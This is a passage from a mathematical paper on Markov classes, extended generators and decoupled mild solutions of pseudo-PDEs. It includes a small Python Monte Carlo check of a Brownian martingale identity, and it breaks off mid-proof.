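dt = T / n_steps

m2_acc, qv_acc = 0.0, 0.0
for _ in range(n_paths):
    b, integ, prev = 0.0, 0.0, 0.0
    for _ in range(n_steps):
        b += math.sqrt(dt) * random.gauss(0.0, 1.0)
        integ += 0.5 * ((2 * prev) ** 2 + (2 * b) ** 2) * dt  # trapezoid for int (2 B_r)^2 dr
        prev = b
    m2_acc += (b * b - T) ** 2  # (M[phi]_T)^2
    qv_acc += integ             # int_0^T Gamma(phi,phi)(B_r) dr

m2 = m2_acc / n_paths  # Monte Carlo estimate of E[(M[phi]_T)^2]
qv = qv_acc / n_paths  # Monte Carlo estimate of E[int_0^T Gamma dr] = E[<M[phi]>_T]
exact = 2.0            # closed form: E[(B_1^2 - 1)^2] = int_0^1 4r dr = 2
```

Both estimates agree with the closed-form value $2$ up to statistical error, as the identity $\mathbbm{E}[M_T^2]=\mathbbm{E}[\langle M\rangle_T]$ requires.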
We introduce some significant spaces related to $V$.
\begin{notation} \label{D212}
$\mathcal{H}^{2,V} := \{M\in\mathcal{H}^2_0|d\langle M\rangle \ll dV\}$.
\\
We will also denote $\mathcal{L}^2(dV\otimes d\mathbbm{P})$ the set of (up to indistinguishability)
progressively measurable processes $\phi$ such that $\mathbbm{E}[\int_0^T \phi^2_rdV_r]<\infty$.
\end{notation}
Proposition 4.11 of
\cite{paper1preprint}
states the following.
\begin{proposition}\label{H2V=H2}
If Hypothesis \ref{MPwellposed} is verified then, under any $\mathbbm{P}^{s,x}$,
\\
$\mathcal{H}_0^2=\mathcal{H}^{2,V}$, where $\mathcal{H}^{2,V}$ was introduced in Notation \ref{D212}.
\end{proposition}
Later in this paper, several functional equations will
be understood up to what we call a set of \textbf{zero potential},
a notion which we recall below.
\begin{definition}\label{zeropotential}
For any $(s,x)\in[0,T]\times E$ we define the \textbf{potential measure} $U(s,x,\cdot)$ on $\mathcal{B}([0,T]\times E)$ by
$U(s,x,A) := \mathbbm{E}^{s,x}\left[\int_s^{T} \mathds{1}_{\{(t,X_t)\in A\}}dV_t\right]$.
\\
A Borel set $A\in\mathcal{B}([0,T]\times E)$ will be said to be
{\bf of zero potential} if, for any $(s,x)\in[0,T]\times E$ we have $U(s,x,A) = 0$.
\end{definition}
\begin{notation}\label{topo}
Let $p > 0$, we define
\\
$\mathcal{L}^p_{s,x} :=\left\{ f\in \mathcal{B}([0,T]\times E,\mathbbm{R}):\, \mathbbm{E}^{s,x}\left[\int_s^{T} |f|^p(r,X_r)dV_r\right] < \infty\right\}$, on which we introduce the usual semi-norm $\|\cdot\|_{p,s,x}: f\mapsto\left(\mathbbm{E}^{s,x}\left[\int_s^{T}|f(r,X_r)|^pdV_r\right]\right)^{\frac{1}{p}}$.
We also denote
$\mathcal{L}^0_{s,x} :=\left\{ f\in \mathcal{B}([0,T]\times E,\mathbbm{R}):\, \int_s^{T} |f|(r,X_r)dV_r < \infty\,\mathbbm{P}^{s,x}\text{ a.s. }\right\}$.
\\
For any $p \ge0$, we then define an intersection of these spaces,
i.e.
\\
$\mathcal{L}^p_X:=\underset{(s,x)\in[0,T]\times E}{\bigcap}\mathcal{L}^p_{s,x}$.
\\
Finally, let $\mathcal{N}$ be the linear subspace of $\mathcal{B}([0,T]\times E,\mathbbm{R})$ containing all functions which are equal to $0$, $U(s,x,\cdot)$-a.e., for every $(s,x)$. For any $p\in \mathbbm{N}$, we define the quotient space $L^p_X := \mathcal{L}^p_X /\mathcal{N}$.
If $p\geq 1$, $L^p_X$ can be equipped with the topology generated by the family of semi-norms $\left(\|\cdot\|_{p,s,x}\right)_{(s,x)\in[0,T]\times E}$, which makes it a separated locally convex topological vector space.
\end{notation}
The statement below corresponds to Proposition 4.14 of
\cite{paper1preprint}.
\begin{proposition}\label{uniquenessupto}
Let $f$ and $g$ be in $\mathcal{B}([0,T]\times E,\mathbbm{R})$ such that the processes $\int_s^{\cdot}f(r,X_r)dV_r$ and $\int_s^{\cdot}g(r,X_r)dV_r$ are finite $\mathbbm{P}^{s,x}$ a.s. for any $(s,x) \in [0,T] \times E$.
Then $f$ and $g$ are equal up to a zero potential set if and only if $\int_s^{\cdot}f(r,X_r)dV_r$ and $\int_s^{\cdot}g(r,X_r)dV_r$ are indistinguishable under $\mathbbm{P}^{s,x}$ for any $(s,x)\in[0,T]\times E$.
\end{proposition}
We recall that if two functions $f, g$ differ
only on a zero potential set then they represent the same element of $L^p_X$.
We recall our notion of \textbf{extended generator}.
\begin{definition}\label{domainextended}
We first define the \textbf{extended domain} $\mathcal{D}(\mathfrak{a})$ as the set of functions $\phi\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ for which there exists
$\psi\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ such that under any $\mathbbm{P}^{s,x}$ the process
\begin{equation} \label{E45}
\mathds{1}_{[s,T]}\left(\phi(\cdot,X_{\cdot}) - \phi(s,x) - \int_s^{\cdot}\psi(r,X_r)dV_r \right)
\end{equation}
(which is not necessarily cadlag) has a cadlag modification in $\mathcal{H}^2_{0}$.
\end{definition}
Proposition 4.16 in \cite{paper1preprint}
states the following.
\begin{proposition}\label{uniquenesspsi}
Let $\phi \in {\mathcal B}([0,T] \times E, {\mathbbm R}).$
There is at most one (up to zero potential sets) $\psi
\in {\mathcal B}([0,T] \times E, {\mathbbm R})$ such that
under any $\mathbbm{P}^{s,x}$, the process defined in \eqref{E45}
has a modification which belongs to ${\mathcal M}_{loc}$.
\\
If moreover $\phi\in\mathcal{D}(a)$, then $a(\phi)=\psi$ up to zero potential sets. In this case, according to Notation \ref{Mphi},
for every $(s,x)\in[0,T]\times E$,
$M[\phi]^{s,x}$ is the $\mathbbm{P}^{s,x}$ cadlag modification
in $\mathcal{H}^2_{0}$ of
$\mathds{1}_{[s,T]}\left(\phi(\cdot,X_{\cdot}) - \phi(s,x) - \int_s^{\cdot}\psi(r,X_r)dV_r \right)$.
\end{proposition}
\begin{definition}\label{extended}
Let $\phi \in \mathcal{D}(\mathfrak{a})$ as in Definition
\ref{domainextended}.
We denote again by $M[\phi]^{s,x}$, the unique
cadlag version
of the process \eqref{E45} in $\mathcal{H}^2_{0}$.
Taking Proposition \ref{uniquenessupto} into account, this will not
generate any ambiguity with respect
to Notation \ref{Mphi}.
Proposition \ref{uniquenesspsi} also permits us to define without ambiguity the operator
\begin{equation*}
\mathfrak{a}:
\begin{array}{rcl}
\mathcal{D}(\mathfrak{a})&\longrightarrow& L^0_X\\
\phi &\longmapsto & \psi.
\end{array}
\end{equation*}
$\mathfrak{a}$ will be called the \textbf{extended generator}.
\end{definition}
We also extend the carr\'e du champ operator $\Gamma(\cdot,\cdot)$
to $\mathcal{D}(\mathfrak{a})\times\mathcal{D}(\mathfrak{a})$.
Proposition 4.18 in
\cite{paper1preprint}
states the following.
\begin{proposition} \label{P321}
Let $\phi$ and $\psi$ be in $\mathcal{D}(\mathfrak{a})$, there exists a (unique up to zero-potential sets) function in $\mathcal{B}([0,T]\times E,\mathbbm{R})$ which we will denote $\mathfrak{G}(\phi,\psi)$ such that under any $\mathbbm{P}^{s,x}$,
$\langle M[\phi]^{s,x},M[\psi]^{s,x}\rangle=\int_s^{\cdot}\mathfrak{G}(\phi,\psi)(r,X_r)dV_r$ on $[s,T]$, up to indistinguishability.
If moreover $\phi$ and $\psi$ belong to $\mathcal{D}(a)$, then $\Gamma(\phi,\psi)=\mathfrak{G}(\phi,\psi)$ up to zero potential sets.
\end{proposition}
\begin{definition}\label{extendedgamma}
The bilinear operator $\mathfrak{G}:\mathcal{D}(\mathfrak{a})\times\mathcal{D}(\mathfrak{a})\longmapsto L^0_X$ will be called the \textbf{extended carr\'e du champ operator}.
\end{definition}
According to Definition \ref{domainextended}, we do not necessarily have $\mathcal{D}(a)\subset\mathcal{D}(\mathfrak{a})$;
however we have the following.
\begin{corollary}\label{RExtendedClassical}
If $\phi\in\mathcal{D}(a)$ and $\Gamma(\phi,\phi)\in\mathcal{L}^1_X$,
then $\phi\in\mathcal{D}(\mathfrak{a})$ and $(a(\phi),\Gamma(\phi,\phi))=(\mathfrak{a}(\phi),\mathfrak{G}(\phi,\phi))$ up to zero potential sets.
\end{corollary}
We also recall Lemma 5.12 of
\cite{paper1preprint}.
\begin{lemma}\label{ModifImpliesdV}
Let $(s,x)\in[0,T]\times E$ be fixed and let $\phi,\psi$ be two measurable processes. If $\phi$ and $\psi$ are $\mathbbm{P}^{s,x}$-modifications of each other, then they are equal $dV\otimes d\mathbbm{P}^{s,x}$ a.e.
\end{lemma}
We now recall the Pseudo-Partial Differential Equation (in short,
Pseudo-PDE) with final condition
that we introduced in
\cite{paper1preprint}.
\\
Let us consider the following data.
\begin{enumerate}
\item A measurable final condition
$g\in\mathcal{B}(E,\mathbbm{R})$;
\item a measurable nonlinear function
$f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$.
\end{enumerate}
The equation is
\begin{equation}\label{PDE}
\left\{
\begin{array}{rccc}
a(u)(t,x) + f\left(t,x,u(t,x),\sqrt{\Gamma(u,u)(t,x)}\right)&=&0& \text{ on } [0,T]\times E \\
u(T,\cdot)&=&g.&
\end{array}\right.
\end{equation}
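For orientation, in the classical Brownian case (a special instance, not required by the abstract framework) where $X$ is a $d$-dimensional Brownian motion, $V_t=t$, $a(u)=\partial_t u+\frac{1}{2}\Delta u$ and $\Gamma(u,u)=|\nabla u|^2$, equation \eqref{PDE} reduces to the semilinear PDE classically associated with Brownian BSDEs:

```latex
\partial_t u + \frac{1}{2}\Delta u
  + f\left(t,x,u,|\nabla u|\right) = 0
  \ \text{ on } [0,T]\times\mathbbm{R}^d,
\qquad u(T,\cdot)=g.
```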
\begin{notation}
Equation \eqref{PDE} will be denoted $Pseudo-PDE(f,g)$.
\end{notation}
\begin{definition}\label{MarkovPDE}
We will say that $u$ is a \textbf{classical solution} of
$Pseudo-PDE(f,g)$
if it belongs to $\mathcal{D}(a)$ and verifies \eqref{PDE}.
\end{definition}
\begin{definition} \label{D417}
A function $u: [0,T] \times E \rightarrow {\mathbbm R}$
will be said
to be a {\bf martingale solution} of $Pseudo-PDE(f,g)$ if
$u\in\mathcal{D}(\mathfrak{a})$ and
\begin{equation}\label{PDEextended}
\left\{\begin{array}{rcl}
\mathfrak{a}(u)&=& -f(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)})\\
u(T,\cdot)&=&g.
\end{array}\right.
\end{equation}
\end{definition}
Until the end of these preliminaries, we will assume some generalized
moment conditions on $X$, and some growth conditions
on the functions $(f,g)$. These will be related to
two functions $\zeta,\eta \in\mathcal{B}(E,\mathbbm{R}_+)$.
\begin{hypothesis}\label{HypMom}
The Markov class will be said \textbf{to verify} $H^{mom}(\zeta,\eta)$ if
\begin{enumerate}
\item for any $(s,x)\in[0,T]\times E$, $\mathbbm{E}^{s,x}[\zeta^2(X_T)]$ is finite;
\item for any $(s,x)\in[0,T]\times E$, $\mathbbm{E}^{s,x}\left[\int_0^T\eta^2(X_r)dV_r\right]$ is finite.
\end{enumerate}
\end{hypothesis}
\begin{hypothesis}\label{Hpq}
A couple of functions
\\
$f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$ and $g\in\mathcal{B}(E,\mathbbm{R})$ will be said \textbf{to verify} $H^{lip}(\zeta,\eta)$ if
there exist positive constants $K^Y,K^Z,C,C'$ such that
\begin{enumerate}
\item $\forall x: \quad |g(x)|\leq C(1+\zeta(x))$;
\item $\forall (t,x):\quad |f(t,x,0,0)|\leq C'(1+\eta(x))$;
\item $\forall (t,x,y,y',z,z'):\quad |f(t,x,y,z)-f(t,x,y',z')|\leq K^Y|y-y'|+K^Z|z-z'|$.
\end{enumerate}
Finally, if we assume that $g$ and $f(\cdot,\cdot,0,0)$ are bounded, we will say that {\bf they
verify} $H^{lip}_b$.
\end{hypothesis}
\begin{remark}
Even if the underlying process $X$ admits no generalized moments, given
a couple $(f,g)$ verifying $H^{lip}_b$, the considerations of this paper still apply.
\end{remark}
We conclude these preliminaries by stating the Theorem of existence and uniqueness of a martingale solution for $Pseudo-PDE(f,g)$. It was the
object of Theorem 5.21 of \cite{paper1preprint}.
\begin{theorem} \label{RMartExistenceUniqueness}
Let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ be a Markov class associated to a transition function measurable
in time (see Definitions \ref{defMarkov} and \ref{DefFoncTrans}) which
fulfills Hypothesis \ref{MPwellposed},
i.e. it is a solution of a well-posed Martingale Problem associated with
the triplet $(\mathcal{D}(a),a,V)$.
Moreover we suppose Hypothesis $H^{mom}(\zeta,\eta)$ for some positive
$\zeta,\eta$. Let $(f,g)$ be a couple verifying $H^{lip}(\zeta,\eta)$,
cf. Hypothesis \ref{Hpq}.
Then $Pseudo-PDE(f,g)$ has a unique martingale solution.
\end{theorem}
We had also shown (see Proposition 5.19 in
\cite{paper1preprint}) that the unique martingale solution is the only possible classical solution, if one exists, as stated below.
\begin{proposition}\label{CoroClassic}
Under the conditions of Theorem \ref{RMartExistenceUniqueness},
a classical solution $u$ of $Pseudo-PDE(f,g)$ such that
$\Gamma(u,u)\in\mathcal{L}^1_X$, is also a martingale solution.
\\
Conversely, if $u$ is a martingale solution of $Pseudo-PDE(f,g)$
belonging to $\mathcal{D}(a)$, then $u$ is a classical solution of $Pseudo-PDE(f,g)$ up to a zero-potential set, meaning that the first equality of \eqref{PDE} holds up to a set of zero potential.
\end{proposition}
\section{Decoupled mild solutions of Pseudo-PDEs}\label{S2}
All along this section we will consider a canonical Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ associated to a transition function $p$ measurable in time (see Definitions \ref{defMarkov}, \ref{DefFoncTrans}) verifying Hypothesis \ref{MPwellposed} for a certain $(\mathcal{D}(a),a,V)$. Positive functions $\zeta,\eta$ are fixed
and we will assume that the Markov class verifies $H^{mom}(\zeta,\eta)$,
see Hypothesis \ref{HypMom}. We are also given a couple of functions $f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$ and $g\in\mathcal{B}(E,\mathbbm{R})$.
\subsection{Definition}\label{mild}
As mentioned in the introduction, in this section we introduce
a notion of solution of
our $Pseudo-PDE(f,g)$ which we call {\it decoupled mild}; it
generalizes the notion of mild solution for partial differential equations.
We will show that such a solution exists and is unique.
Indeed, that function will be the one appearing in Theorem \ref{Defuv}.
A function $u$ will be a {\it decoupled mild} solution of
$Pseudo-PDE(f,g)$ if there is a function $v$
such that the couple $(u,v)$ is a (decoupled mild) solution of the
identification problem $IP(f,g)$.
In this section we first introduce a notion of {\it decoupled mild solution}
for the identification problem, which is of interest in its own right.
We will consider couples $(f,g)$ which satisfy weaker
conditions than those of type $H^{lip}(\zeta,\eta)$ (see Hypothesis \ref{Hpq}),
namely the following ones.
\begin{hypothesis}\label{Hpqeq}
A couple of functions
\\
$f\in\mathcal{B}([0,T]\times E\times\mathbbm{R}\times\mathbbm{R},\mathbbm{R})$ and $g\in\mathcal{B}(E,\mathbbm{R})$ will be said \textbf{to verify} $H^{growth}(\zeta,\eta)$ if
there exist positive constants $C,C'$ such that
\begin{enumerate}
\item $\forall x: \quad |g(x)|\leq C(1+\zeta(x))$;
\item $\forall (t,x,y,z):\quad |f(t,x,y,z)|\leq C'(1+\eta(x)+|y|+|z|)$.
\end{enumerate}
\end{hypothesis}
\begin{notation}
Let $s,t$ in $[0,T]$ with $s\leq t$, $x\in E$ and $\phi\in \mathcal{B}(E,\mathbbm{R})$. If the expectation $\mathbbm{E}^{s,x}[|\phi(X_t)|]$ is finite, then $P_{s,t}[\phi](x)$ will denote $\mathbbm{E}^{s,x}[\phi(X_t)]$.
\end{notation}
We recall two important measurability properties.
\begin{remark} Let $\phi\in\mathcal{B}(E,\mathbbm{R})$.
\begin{itemize}
\item Suppose that for any $(s,x,t)$,
$\mathbbm{E}^{s,x}[|\phi(X_t)|]<\infty$. Then by Proposition \ref{measurableint}, $(s,x,t)\longmapsto P_{s,t}[\phi](x)$ is Borel.
\item Suppose that for every $(s,x)$, $\mathbbm{E}^{s,x}[\int_s^{T}|\phi(X_r)|dV_r]<\infty$. Then by Lemma \ref{LemmaBorel},
$(s,x)\longmapsto\int_s^TP_{s,r}[\phi](x)dV_r$ is Borel.
\end{itemize}
\end{remark}
In our general setup, considering some operator $a$, the equation
\begin{equation}
a(u) + f\left(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}\right)=0,
\end{equation}
can be naturally decoupled into
\begin{equation}
\left\{
\begin{array}{rcl}
a(u) &=& - f(\cdot,\cdot,u,v)\\
\Gamma(u,u) &=& v^2.
\end{array}\right.
\end{equation}
Since $\Gamma(u,u)=a(u^2)-2ua(u)$, this system of equations can be rewritten as
\begin{equation}
\left\{
\begin{array}{rcl}
a(u) &=& - f(\cdot,\cdot,u,v)\\
a(u^2) &=& v^2 - 2uf(\cdot,\cdot,u,v).
\end{array}\right.
\end{equation}
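As a sanity check of the identity $\Gamma(u,u)=a(u^2)-2ua(u)$ used above, consider the heat generator $a(u)=\partial_t u+\frac{1}{2}\Delta u$ on $\mathbbm{R}^d$ (a classical special case, not part of the abstract setting); for smooth $u$ one computes

```latex
a(u^2) = \partial_t (u^2) + \tfrac{1}{2}\Delta (u^2)
       = 2u\,\partial_t u + u\,\Delta u + |\nabla u|^2
       = 2u\,a(u) + |\nabla u|^2,
```

so that $\Gamma(u,u)=|\nabla u|^2$, recovering the usual gradient term.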
On the other hand our Markov process $X$ is time non-homogeneous and $V_t$ can be more general than $t$,
which leads us to the following definition of a decoupled mild solution.
\begin{definition}\label{mildsoluv}
Let $(f,g)$ be a couple verifying $H^{growth}(\zeta,\eta)$.
\\
Let $u,v\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ be two Borel functions with $v\geq 0$.
\begin{enumerate}
\item The couple $(u,v)$ will be called {\bf solution
of the identification problem determined by $(f,g)$}
or simply {\bf solution of }
$IP(f,g)$ if $u$ and $v$ belong to $\mathcal{L}^2_X$ and if for every $(s,x)\in[0,T]\times E$,
\begin{equation}\label{MildEq}
\left\{
\begin{array}{rcl}
u(s,x)&=&P_{s,T}[g](x)+\int_s^TP_{s,r}\left[f\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right)\right](x)dV_r\\
u^2(s,x) &=&P_{s,T}[g^2](x) -\int_s^TP_{s,r}\left[v^2(r,\cdot)-2u(r,\cdot)f\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right)\right](x)dV_r.
\end{array}\right.
\end{equation}
\item The function $u$ will be called {\bf decoupled mild solution}
of $Pseudo-PDE(f,g)$ if there is a function $v$
such that the couple $(u,v)$ is a solution
of $IP(f,g)$.
\end{enumerate}
\end{definition}
\begin{lemma}\label{LemmaMild}
Let $u,v\in\mathcal{L}^2_X$, and let $f$ be a Borel function satisfying the second item of $H^{growth}(\zeta,\eta)$; then $f\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^2_X$ and $uf\left(\cdot,\cdot,u,v\right)$ to $\mathcal{L}^1_X$.
\end{lemma}
\begin{proof}
Thanks to the growth condition on $f$ in $H^{growth}(\zeta,\eta)$, there exists a constant $C>0$ such that for any $(s,x)\in[0,T]\times E$,
\begin{equation}\label{EqUniqueness}
\begin{array}{rcl}
&& \mathbbm{E}^{s,x}\left[\int_s^T f^2(r,X_r,u(r,X_r),v(r,X_r))dV_r\right]\\
&\leq& C\mathbbm{E}^{s,x}\left[\int_s^T(1+\eta^2(X_r) +u^2(r,X_r)+v^2(r,X_r))dV_r\right]
< \infty,
\end{array}
\end{equation}
since we have assumed that $u^2,v^2$ belong to $\mathcal{L}^1_X$, and since we have made Hypothesis \ref{HypMom} and assumed $H^{growth}(\zeta,\eta)$. This means that $f^2\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^1_X$, i.e. that $f\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^2_X$. Since $2\left|uf\left(\cdot,\cdot,u,v\right)\right|\leq u^2+f^2\left(\cdot,\cdot,u,v\right)$, it follows that $uf\left(\cdot,\cdot,u,v\right)$ also belongs to $\mathcal{L}^1_X$.
\end{proof}
\begin{remark} Consequently,
under the assumptions of Lemma \ref{LemmaMild}
all the terms in \eqref{MildEq} make sense.
\end{remark}
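To see why \eqref{MildEq} deserves the name ``mild'', note that in the special case where $X$ is a $d$-dimensional Brownian motion and $V_t=t$ (an illustration only, with $p_t$ denoting the Gaussian heat kernel), the first line of \eqref{MildEq} becomes the familiar Duhamel-type formula

```latex
u(s,x) = \int_{\mathbbm{R}^d} p_{T-s}(x,y)\,g(y)\,dy
  + \int_s^T\!\!\int_{\mathbbm{R}^d} p_{r-s}(x,y)\,
    f\big(r,y,u(r,y),v(r,y)\big)\,dy\,dr,
```

while the second line is the additional constraint which identifies $v$ without involving $\nabla u$ explicitly.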
\subsection{Existence and uniqueness of a solution}\label{mart-mild}
\begin{proposition}\label{MartingaleImpliesMild}
Assume that $(f,g)$ verifies $H^{growth}(\zeta,\eta)$ (see Hypothesis \ref{Hpqeq}) and
let $u\in\mathcal{L}^2_X$ be a martingale solution of $Pseudo-PDE(f,g)$.
Then $(u,\sqrt{\mathfrak{G}(u,u)})$ is a
solution of $IP(f,g)$ and in particular, $u$ is a decoupled mild solution of $Pseudo-PDE(f,g)$.
\end{proposition}
\begin{proof}
Let $u\in\mathcal{L}^2_X$ be a martingale solution of $Pseudo-PDE(f,g)$. We emphasize that, taking Definition \ref{domainextended} and Proposition \ref{P321} into account, $\mathfrak{G}(u,u)$ belongs to $\mathcal{L}^1_X$,
or equivalently that $\sqrt{\mathfrak{G}(u,u)}$ belongs to $\mathcal{L}^2_X$. By Lemma \ref{LemmaMild}, it follows that
$f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\in\mathcal{L}^2_X$ and $uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\in\mathcal{L}^1_X$.
\\
We fix some $(s,x)\in[0,T]\times E$ and the corresponding probability $\mathbbm{P}^{s,x}$. We are going to show that
\begin{equation} \label{MildEqAux}
\left\{
\begin{array}{rcl}
u(s,x)&=&P_{s,T}[g](x)+\int_s^TP_{s,r}\left[f\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r\\
u^2(s,x) &=&P_{s,T}[g^2](x) -\int_s^TP_{s,r}\left[\mathfrak{G}(u,u)(r,\cdot)-2u(r,\cdot)f\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r.
\end{array}\right.
\end{equation}
Combining Definitions \ref{domainextended}, \ref{extended}, \ref{D417}, we know that on $[s,T]$, the process $u(\cdot,X_{\cdot})$ has a cadlag
modification, which we denote by $U^{s,x}$, and which is a special semimartingale with decomposition
\begin{equation}\label{decompoU}
U^{s,x}=u(s,x)-\int_s^{\cdot}f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r +M[u]^{s,x},
\end{equation}
where $M[u]^{s,x}\in\mathcal{H}^2_0$.
Definition \ref{D417} also states that $u(T,\cdot)=g$, implying that
\begin{equation}
u(s,x)=g(X_T)+\int_s^Tf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r -M[u]^{s,x}_T\text{ a.s.}
\end{equation}
Taking the expectation, by Fubini's theorem we get
\begin{equation}
\begin{array}{rcl}
u(s,x) &=&\mathbbm{E}^{s,x}\left[g(X_T) +\int_s^T f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r\right]\\
&=&P_{s,T}[g](x)+\int_s^TP_{s,r}\left[f\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r.
\end{array}
\end{equation}
By integration by parts, we obtain
\begin{equation}
d(U^{s,x})^2_t=-2U^{s,x}_tf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(t,X_t)dV_t+2U^{s,x}_{t^-}dM[u]^{s,x}_t +d[M[u]^{s,x}]_t,
\end{equation}
so integrating from $s$ to $T$, we get
\begin{equation}
\begin{array}{rcl}\label{Eq322}
&&u^2(s,x)\\
&=& g^2(X_T)+2\int_s^TU_r^{s,x}f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r -2\int_s^TU^{s,x}_{r^-}dM[u]^{s,x}_r -[M[u]^{s,x}]_T\\
&=&g^2(X_T)+2\int_s^Tuf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r -2\int_s^TU^{s,x}_{r^-}dM[u]^{s,x}_r -[M[u]^{s,x}]_T,
\end{array}
\end{equation}
where the latter equality is a consequence of Lemma \ref{ModifImpliesdV}.
The next step will consist in taking the expectation in equation \eqref{Eq322}, but before, we will check that $\int_s^{\cdot}U^{s,x}_{r^-}dM[u]^{s,x}_r$ is a martingale.
Thanks to \eqref{decompoU}, the Cauchy-Schwarz inequality and the convexity of $x\mapsto x^2$, there exists a constant $C>0$ such that
\begin{equation}
\underset{t\in[s,T]}{\text{sup }}(U^{s,x}_t)^2\leq C\left(u^2(s,x)+\int_s^Tf^2\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r +\underset{t\in[s,T]}{\text{sup }}(M[u]^{s,x}_t)^2\right).
\end{equation}
Since $M[u]^{s,x}\in\mathcal{H}^2_0$ and $f\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\in\mathcal{L}^2_X$,
it follows that $\underset{t\in[s,T]}{\text{sup }}(U^{s,x}_t)^2\in L^1$ and Lemma 3.15 in
\cite{paper1preprint}
states that $\int_s^{\cdot}U^{s,x}_{r^-}dM[u]^{s,x}_r$ is a martingale.
Taking the expectation in \eqref{Eq322}, we now obtain
\begin{equation}
\begin{array}{rcl}
u^2(s,x) &=& \mathbbm{E}^{s,x}\left[g^2(X_T) +\int_s^T 2uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r-\left[M[u]^{s,x}\right]_T\right]\\
&=& \mathbbm{E}^{s,x}\left[g^2(X_T) +\int_s^T 2uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)(r,X_r)dV_r-\langle M[u]^{s,x}\rangle_T\right]\\
&=&\mathbbm{E}^{s,x}\left[g^2(X_T)\right]- \mathbbm{E}^{s,x}\left[\int_s^T \left(\mathfrak{G}(u,u)-2uf\left(\cdot,\cdot,u,\sqrt{\mathfrak{G}(u,u)}\right)\right)(r,X_r)dV_r\right]\\
&=& P_{s,T}[g^2](x) -\int_s^TP_{s,r}\left[\mathfrak{G}(u,u)(r,\cdot)-2u(r,\cdot)f\left(r,\cdot,u(r,\cdot),\sqrt{\mathfrak{G}(u,u)}(r,\cdot)\right)\right](x)dV_r,
\end{array}
\end{equation}
where the third equality derives from Proposition \ref{P321} and the fourth from Fubini's theorem.
This concludes the proof.
\end{proof}
We now show the converse result of Proposition \ref{MartingaleImpliesMild}.
\begin{proposition}\label{MildImpliesMartingale}
Assume that $(f,g)$ verifies $H^{growth}(\zeta,\eta)$,
see Hypothesis \ref{Hpqeq}.
Every decoupled mild solution of $Pseudo-PDE(f,g)$ is also a martingale solution. Moreover, if $(u,v)$ solves $IP(f,g)$, then $v^2=\mathfrak{G}(u,u)$ (up to zero potential sets).
\end{proposition}
\begin{proof}
Let $u$ and $v\geq 0$ be a couple of functions in $\mathcal{L}^2_X$ verifying \eqref{MildEq}. We first note that the first line of \eqref{MildEq} with $s=T$ gives $u(T,\cdot)=g$.
\\
We fix $(s,x)\in[0,T]\times E$ and the associated probability $\mathbbm{P}^{s,x}$, and on $[s,T]$,
we set $U_t:=u(t,X_t)$ and $N_t:=u(t,X_t)-u(s,x)+\int_s^tf(r,X_r,u(r,X_r),v(r,X_r))dV_r$.
\\
\\
Combining the first line of \eqref{MildEq} applied at $(s,x)=(t,X_t)$ with the Markov property \eqref{Markov3}, and since $f\left(\cdot,\cdot,u,v\right)$ belongs to $\mathcal{L}^2_X$ (see Lemma \ref{LemmaMild}), we get the a.s. equalities
\begin{equation}
\begin{array}{rcl}
U_t &=& u(t,X_t) \\
&=& P_{t,T}[g](X_t) + \int_t^TP_{t,r}\left[f\left(r,\cdot,u(r,\cdot),v(r,\cdot)\right)\right](X_t)dV_r\\
&=& \mathbbm{E}^{t,X_t}\left[g(X_T)+\int_t^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r\right] \\
&=& \mathbbm{E}^{s,x}\left[g(X_T)+\int_t^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r|\mathcal{F}_t\right],
\end{array}
\end{equation}
from which we deduce that
$N_t=\mathbbm{E}^{s,x}\left[g(X_T)+\int_s^T f(r,X_r,u(r,X_r),v(r,X_r))dV_r|\mathcal{F}_t\right]-u(s,x)$ a.s.
So $N$ is a martingale. We can therefore consider, on $[s,T]$ and under $\mathbbm{P}^{s,x}$, the cadlag version $N^{s,x}$ of $N$, and the special semi-martingale
\\
$U^{s,x} := u(s,x)- \int_s^{\cdot} f(r,X_r,u(r,X_r),v(r,X_r))dV_r + N^{s,x}$ which is a cadlag version of $U$.
By Jensen's inequality for both the expectation and the
conditional expectation, together with the Cauchy-Schwarz inequality, we have
\begin{equation}
\begin{array}{rcl}
